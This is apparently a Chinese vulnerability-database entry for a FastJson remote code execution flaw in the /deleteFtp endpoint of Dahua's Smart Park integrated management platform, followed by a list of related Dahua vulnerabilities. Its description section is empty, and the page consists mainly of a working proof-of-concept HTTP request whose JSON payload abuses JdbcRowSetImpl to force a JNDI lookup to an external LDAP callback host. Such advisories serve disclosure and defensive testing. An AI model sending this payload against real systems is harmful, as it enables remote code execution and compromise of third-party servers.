大华智慧园区综合管理平台 /deleteFtp 路径存在FastJson 远程代码执行

漏洞描述

PoC代码

POST /CardSolution/card/accessControl/swingCardRecord/deleteFtp HTTP/1.1
Host: 
Content-Type: application/json

{"ftpUrl":{"e":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"f":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://clmmm09r8kkedikc4900otiwibdhw1i7t.oast.fun","autoCommit":true}}}

相关漏洞推荐

• dahua-bitmap-fileupload: 大华智慧园区综合管理平台bitmap接口存在任意文件上传
• dahua-sso-initsession-action-create-user: 大华智慧园区综合管理平台远程代码执行漏洞
• POC dahua-smart-park-deleteftp-rce: 大华智慧园区综合管理平台 deleteFtp 远程命令执行
• POC dahua-zhyq-video-fileupload: 大华 智慧园区综合管理平台 video 任意文件上传漏洞
• 大华智慧园区综合管理平台&大华DSS存在前台任意用户密码重置漏洞
• 大华智慧园区综合管理平台 bitmap_findAllMapByUserId.action SQL注入漏洞
• 大华智慧园区综合管理平台 carport_getCarportListByMultiCondition SQL注入漏洞
• 大华智慧园区综合管理平台 任意文件上传漏洞
• 大华智慧园区综合管理平台 任意文件上传漏洞
• 大华智慧园区综合管理平台 groupInfo_resendGroup SQL注入漏洞
• 大华智慧园区综合管理平台 clientServer SQL 注入漏洞
• 大华智慧园区综合管理平台 user_getUserInfoByUserName.action 信息泄漏漏洞
• 大华智慧园区综合管理平台 recover_recover.action 任意文件上传漏洞